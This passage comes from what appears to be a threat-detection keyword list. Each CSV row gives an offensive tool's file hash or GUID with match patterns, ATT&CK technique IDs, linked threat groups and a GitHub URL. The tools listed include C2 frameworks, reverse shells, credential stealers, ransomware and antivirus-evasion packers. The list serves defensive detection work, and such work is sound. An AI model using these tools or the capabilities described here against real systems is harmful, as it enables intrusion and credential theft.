framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27577" "*5e77fa12d0f1b9a4a7249a6a496f8236552bc0adcbe818d9e997e1ca68819224*",".{0,1000}5e77fa12d0f1b9a4a7249a6a496f8236552bc0adcbe818d9e997e1ca68819224.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","27578" "*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*",".{0,1000}5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","27582" "*5e87e7fe137ab8f51780b6646e74e942efa89a4ff95cb190dd0bf35a5dcf59e8*",".{0,1000}5e87e7fe137ab8f51780b6646e74e942efa89a4ff95cb190dd0bf35a5dcf59e8.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","27583" 
"*5e8d04c49ec9bac3e5269c5054dab440fd521a3840b9c8702e8ecadc01d392a6*",".{0,1000}5e8d04c49ec9bac3e5269c5054dab440fd521a3840b9c8702e8ecadc01d392a6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27584" "*5e8f9273ea80b99b0ee172727808e3293a61f7788a534d0ad9a824c9c6753bf0*",".{0,1000}5e8f9273ea80b99b0ee172727808e3293a61f7788a534d0ad9a824c9c6753bf0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27585" "*5E9715AB-CAF7-4FFF-8E14-A8727891DA93*",".{0,1000}5E9715AB\-CAF7\-4FFF\-8E14\-A8727891DA93.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27586" "*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","27587" "*5ea4f3837040a1342e8eed81e10d5dcf1e28f1b67478d8cd421007201758995f*",".{0,1000}5ea4f3837040a1342e8eed81e10d5dcf1e28f1b67478d8cd421007201758995f.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","27591" "*5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1*",".{0,1000}5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27592" "*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27593" "*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 
- TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27594" "*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27595" "*5eb106f4e859025654fcab29697c9b4599545b89da2ddd9c5db318c0b53cd66d*",".{0,1000}5eb106f4e859025654fcab29697c9b4599545b89da2ddd9c5db318c0b53cd66d.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27596" "*5eb4a246d7a9adaffedd89bcca6d86ba57a30380ce90438b57a45e61b9e06ec0*",".{0,1000}5eb4a246d7a9adaffedd89bcca6d86ba57a30380ce90438b57a45e61b9e06ec0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","27597" 
"*5eb8024e00c244de2646f2b338be02e7a6475637fd04894a3e13d37783b0d693*",".{0,1000}5eb8024e00c244de2646f2b338be02e7a6475637fd04894a3e13d37783b0d693.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","27598" "*5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b*",".{0,1000}5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27600" "*5EC16C3F-1E62-4661-8C20-504CB0E55441*",".{0,1000}5EC16C3F\-1E62\-4661\-8C20\-504CB0E55441.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#GUIDproject","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","27601" "*5ecc5632202031a45845046c5c8287530dbbdfb724af5ee412063865cf37d58e*",".{0,1000}5ecc5632202031a45845046c5c8287530dbbdfb724af5ee412063865cf37d58e.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27602" 
"*5ED2F78E-8538-4C87-BCED-E19E9DAD879C*",".{0,1000}5ED2F78E\-8538\-4C87\-BCED\-E19E9DAD879C.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#GUIDproject","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","27603" "*5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317*",".{0,1000}5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","27604" "*5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317*",".{0,1000}5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","27605" "*5ee47f66e30d5ccc81ab8a3df639396b7e45aee360906b08012d06cdc6a13ff9*",".{0,1000}5ee47f66e30d5ccc81ab8a3df639396b7e45aee360906b08012d06cdc6a13ff9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27606" "*5eec8d9cc549596b2f6b9bc955202ef6be8e2b74849769904af8aceb477c5044*",".{0,1000}5eec8d9cc549596b2f6b9bc955202ef6be8e2b74849769904af8aceb477c5044.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27607" "*5f01ca453b976669370a3d5975837773107dd5522e8259dccda788993bb0da89*",".{0,1000}5f01ca453b976669370a3d5975837773107dd5522e8259dccda788993bb0da89.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","#filehash","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","27611" "*5f01feb0f870564dae6ef4741dc3b0e200517ea1d712d095a67f4c84bc922bea*",".{0,1000}5f01feb0f870564dae6ef4741dc3b0e200517ea1d712d095a67f4c84bc922bea.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","27612" "*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","#GUIDproject","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","27613" "*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27614" "*5f026c27-f8e6-4052-b231-8451c6a73838*",".{0,1000}5f026c27\-f8e6\-4052\-b231\-8451c6a73838.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27615" "*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27616" 
"*5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440*",".{0,1000}5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27619" "*5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac*",".{0,1000}5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27621" "*5f346d82d780b573ffd6e4ae1051dd96d10d5141d17535d5538ae8713096085b*",".{0,1000}5f346d82d780b573ffd6e4ae1051dd96d10d5141d17535d5538ae8713096085b.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","27623" "*5f34b6621adfd6fcb5d9bed2972fc7f7409c04775ad1a11b396715784910ecef*",".{0,1000}5f34b6621adfd6fcb5d9bed2972fc7f7409c04775ad1a11b396715784910ecef.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27624" "*5f478850626a5b6b9fb2f8ffcdc4178424f4fc907f7879f1419e35963afb916c*",".{0,1000}5f478850626a5b6b9fb2f8ffcdc4178424f4fc907f7879f1419e35963afb916c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - 
T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27628" "*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*",".{0,1000}5F4DC47F\-7819\-4528\-9C16\-C88F1BE97EC5.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#GUIDproject","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","27629" "*5f54bd1d5ca340f7276bce27fe649e8465aaec2482a8db998de5b069d17633b3*",".{0,1000}5f54bd1d5ca340f7276bce27fe649e8465aaec2482a8db998de5b069d17633b3.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27632" "*5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa*",".{0,1000}5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27634" "*5f685def3707cb4737e0e520d86b05a0c7c7d973c9b0d26b89dddd9f1d615404*",".{0,1000}5f685def3707cb4737e0e520d86b05a0c7c7d973c9b0d26b89dddd9f1d615404.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","0","#filehash","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","27635" "*5f76ace41e6efb7af838f936421f53fd66eed1efdcfde03950f3432816fadeed*",".{0,1000}5f76ace41e6efb7af838f936421f53fd66eed1efdcfde03950f3432816fadeed.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","27638" 
"*5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0*",".{0,1000}5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27639" "*5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1*",".{0,1000}5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","#filehash","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","27641" "*5f8801faa0e5801368ca51f92bf4483c663348465d00e300e0323c081833c8a3*",".{0,1000}5f8801faa0e5801368ca51f92bf4483c663348465d00e300e0323c081833c8a3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27643" 
"*5f89dd30417c33eb50fb0bd4e375102ce4c0bb7932384eb7479665e7c7f3c8fe*",".{0,1000}5f89dd30417c33eb50fb0bd4e375102ce4c0bb7932384eb7479665e7c7f3c8fe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27644" "*5f8c475f1a4772644bbae8e3a31e11e78b7f44a1559f5e6bb58b7b3b9083323d*",".{0,1000}5f8c475f1a4772644bbae8e3a31e11e78b7f44a1559f5e6bb58b7b3b9083323d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27645" "*5f8fdd73abce168e8b44db54ad203a66d4983d1fd2563bb5922c0aaef9abc4ea*",".{0,1000}5f8fdd73abce168e8b44db54ad203a66d4983d1fd2563bb5922c0aaef9abc4ea.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","27646" "*5f9bb909c87cb452a6edbd9da0b5cfdd3f729d7393cf9f7f94e3b731503d072d*",".{0,1000}5f9bb909c87cb452a6edbd9da0b5cfdd3f729d7393cf9f7f94e3b731503d072d.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27648" 